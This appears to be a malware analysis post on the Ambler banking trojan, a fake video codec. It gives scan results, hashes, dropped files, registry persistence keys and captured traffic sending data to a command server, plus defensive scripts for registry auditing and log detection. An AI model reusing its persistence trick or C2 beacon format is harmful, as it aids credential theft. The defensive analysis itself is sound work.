Trojan-Dropper.Win32.Ambler

Recently a user submitted a suspicious file; he told us that he had downloaded it from a website which served it as a video codec. Below is the report of the virus scanner:

Report Generated: 18.3.2009 at 16.34.15 (GMT 1)
File Name: setup_exe
File Size: 63 KB
MD5 Hash: A11E0E5389C93738D793E850C8AAA1C1
SHA1 Hash: FB87D25EB2AB42392009809A2369F42618D3DDD1
Detection Rate: 7 of 24 (29.16 %)
Status: INFECTED

Antivirus Sig version Engine Version Result
a-squared 18/03/2009 4.0.0.32 Trojan-Dropper.Win32.Ambler!IK
Avira AntiVir 7.1.2.187 8.1.2.12 TR/Banker.Banker.aflq
Avast 090317-0 4.8.1229 –
AVG 270.11.18/2009 8.0.0.0 –
BitDefender 18/03/2009 7.0.0.2555 –
ClamAV 18/03/2009 0.93.1.0 –
Comodo 1066 3.8 –
Dr.Web 18/03/2009 5.0 –
Ewido 18/03/2009 4.0.0.2 –
F-PROT 6 20090317 4.4.4.56 –
G DATA 19.3655 2.0.7309.847 –
IkarusT3 18/03/2009 1001044 Trojan-Dropper.Win32.Ambler
Kaspersky 18/03/2009 8.0.0.357 –
McAfee 18/03/2009 5.1.0.0 PWS-Banker trojan
Malware Hash Registry 18/03/2009 N/A –
NOD32 v3 3945 3.0.677 Win32/Spy.Ambler
Norman 2009/03/17 5.92.08 Trojan W32/Malware.FZKP
Panda 07/02/2009 9.5.1.00 –
QuickHeal 18 March, 2009 10.0 –
Solo Antivirus 18/03/2009 8.0 –
Sophos 18/03/2009 4.32.0 Troj/Spy-BV
TrendMicro 901(590100) 1.1-1001 –
VBA32 18/03/2009 3.12.0.300 –
VirusBuster 10.102.13 1.4.3 –

After the malicious file is executed, two files are copied into the system32 folder:

C:\WINDOWS\system32\wh
C:\WINDOWS\system32\kmsvc32.dll

The file kmsvc32.dll is classified as a spy tool:

a-squared 18/03/2009 4.0.0.32 Trojan-PWS.Win32.Agent!IK
AVG 270.11.18/2009 8.0.0.0 PSW.Generic7.TP
NOD32 v3 3945 3.0.677 Win32/Spy.Ambler.M
Norman 2009/03/17 5.92.08 Backdoor W32/Smalldoor.DSTB

The malware modified the registry by adding these keys:

HKCR\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\Google plugin
HKCR\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\InprocServer32\kmsvc32.dll
HKLM\SOFTWARE\Classes\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\Google plugin
HKLM\SOFTWARE\Classes\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\InprocServer32\kmsvc32.dll
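The keys above register kmsvc32.dll as a COM in-process server under a CLSID labelled "Google plugin", so any process that instantiates that CLSID loads the DLL; the HKCR view is simply a merged view of HKLM\SOFTWARE\Classes. A quick way to triage such persistence on an exported hive is to parse the .reg file and look at every InprocServer32 default value. The script below is an added example, not part of the original post or of any NoVirusThanks tool: it parses a small constructed .reg excerpt (the CLSID, name and DLL are the ones listed above; the second, benign entry is invented) and flags servers whose DLL is given as a bare file name, which Windows then resolves through the DLL search order, or whose name matches the component described here.

```python
"""Triage COM InprocServer32 registrations in a .reg export (added example)."""
import re

# Constructed .reg excerpt: first CLSID mirrors the keys from the post, the second is a benign filler.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}]
@="Google plugin"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\InprocServer32]
@="kmsvc32.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}]
@="Example benign server"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\WINDOWS\\system32\\example.dll"
"ThreadingModel"="Apartment"
"""

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
# Matches `@="..."` (default value) or `"name"="..."`; REG_SZ only, which is all InprocServer32 needs.
VALUE_RE = re.compile(r'^(?P<name>@|"[^"]*")=(?P<val>"(?:[^"\\]|\\.)*")$')
CLSID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
# DLL name taken from the post; extend with other indicators as needed.
KNOWN_BAD_DLLS = {"kmsvc32.dll"}


def unescape(s):
    """Undo .reg string escaping (\\ and \")."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Return {key path: {value name: string value}}; "" is the default value."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        km = KEY_RE.match(line)
        if km:
            current = km.group("key")
            keys.setdefault(current, {})
            continue
        vm = VALUE_RE.match(line)
        if vm and current is not None:
            name = vm.group("name")
            name = "" if name == "@" else name[1:-1]
            keys[current][name] = unescape(vm.group("val")[1:-1])
    return keys


def audit_inprocservers(keys):
    """Flag InprocServer32 entries worth a closer look; returns a list of findings."""
    findings = []
    for key, values in keys.items():
        if not key.lower().endswith("\\inprocserver32"):
            continue
        parent = key.rsplit("\\", 1)[0]
        dll = values.get("", "")
        basename = dll.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        reasons = []
        if dll and "\\" not in dll and "/" not in dll:
            reasons.append("bare DLL name, resolved via DLL search order")
        if basename in KNOWN_BAD_DLLS:
            reasons.append("DLL name matches known dropper component")
        if reasons:
            cm = CLSID_RE.search(parent)
            findings.append({
                "clsid": cm.group(0) if cm else parent,
                "name": keys.get(parent, {}).get("", ""),
                "dll": dll,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit_inprocservers(parse_reg(SAMPLE_REG)):
        print(f["clsid"], repr(f["name"]), f["dll"], "->", "; ".join(f["reasons"]))
```

Run it against `reg export HKLM\SOFTWARE\Classes\CLSID clsid.reg` output from the suspect machine. A bare DLL name is only a triage hint (some legitimate registrations use it too), so confirm a hit by locating the DLL on disk and checking its hash against the values in the scan report.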

Now, immediately after I opened Internet Explorer, the malware started sending and receiving data with this IP:

85.17.209.45 (e-point.com.ua)

Internet traffic:

GET /admin/cd.php?userid=-- HTTP/1.1
User-Agent: AS
Host: e-point.com.ua
Cache-Control: no-cache
HTTP/1.1 200 OK
 
POST /admin/dan.php HTTP/1.1
Referer: SAS
Content-Type: application/x-www-form-urlencoded
User-Agent: AE
Host: e-point.com.ua
Content-Length: 30
Cache-Control: no-cache
 
GET /admin/cd.php?userid=1190928_11344_24235789 HTTP/1.1
User-Agent: AS
Host: e-point.com.ua
Cache-Control: no-cache
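The check-in traffic above has two cheap, stable markers: a two-letter User-Agent (AS for the GET check-in, AE for the POST upload) and the fixed paths /admin/cd.php and /admin/dan.php on e-point.com.ua. The script below is an added example, not part of the original post: it runs those indicators over constructed proxy log lines (a simplified access.log layout of timestamp, client, method, URL, status and quoted User-Agent, which is an assumption about your log format) and extracts the userid parameter so infected hosts can be listed. The last sample line shows why the path alone is not treated as a strong indicator.

```python
"""Detect Ambler-style C2 check-ins in HTTP proxy logs (added example)."""
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the traffic captured in the post.
C2_HOSTS = {"e-point.com.ua"}
C2_PATHS = {"/admin/cd.php", "/admin/dan.php"}
BEACON_USER_AGENTS = {"AS", "AE"}

# Constructed sample log: timestamp client method url status "user-agent".
SAMPLE_LOG = """\
1237388055.123 10.0.0.12 GET http://e-point.com.ua/admin/cd.php?userid=-- 200 "AS"
1237388056.456 10.0.0.12 POST http://e-point.com.ua/admin/dan.php 200 "AE"
1237388057.789 10.0.0.12 GET http://e-point.com.ua/admin/cd.php?userid=1190928_11344_24235789 200 "AS"
1237388060.000 10.0.0.15 GET http://www.example.com/index.html 200 "Mozilla/4.0 (compatible; MSIE 7.0)"
1237388061.000 10.0.0.16 GET http://www.example.com/admin/cd.php?userid=1 200 "Mozilla/4.0 (compatible; MSIE 7.0)"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Split one log line into fields; returns None for lines that do not match the layout."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["host"] = parts.hostname or ""
    rec["path"] = parts.path
    rec["userid"] = parse_qs(parts.query).get("userid", [None])[0]
    return rec


def classify(rec):
    """Return the indicators a record matches; host and User-Agent are strong, the path is weak."""
    reasons = []
    if rec["ua"] in BEACON_USER_AGENTS:
        reasons.append("two-letter User-Agent %r" % rec["ua"])
    if rec["host"] in C2_HOSTS:
        reasons.append("known C2 host")
    if rec["path"] in C2_PATHS:
        reasons.append("C2 check-in path")
    return reasons


def is_strong(reasons):
    """A bare path match is too generic to fire on its own."""
    return any(r != "C2 check-in path" for r in reasons)


def find_beacons(log_text):
    """Return one hit per line that matches a strong indicator, with the bot id if present."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if is_strong(reasons):
            hits.append({"client": rec["client"], "url": rec["url"],
                         "userid": rec["userid"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in find_beacons(SAMPLE_LOG):
        print(h["client"], h["url"], h["userid"], "->", "; ".join(h["reasons"]))
```

The User-Agent rule is the one worth keeping after the C2 host changes: a browser never sends a two-letter User-Agent, so an exact match on AS or AE over proxy logs is a low-noise hunt even without the host indicator.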

Note that the User-Agent is always set to AS or AE. Afterwards, we found new files in the Temporary Internet Files folder:

Screenshot of files

New files were also copied into the system32 folder:

C:\WINDOWS\system32\fiod.dll
C:\WINDOWS\system32\bb1.dat
C:\WINDOWS\system32\cmds.txt
C:\WINDOWS\system32\cs.dat
C:\WINDOWS\system32\fiod.dll
C:\WINDOWS\system32\ps1.dat
C:\WINDOWS\system32\rc.dat

How to remove Trojan-Dropper.Win32.Ambler?

1) Unregister the dll named kmsvc32.dll
2) Delete all created files
3) Delete all created registry keys
4) Restart the PC

Scan your system with NoVirusThanks Malware Remover.
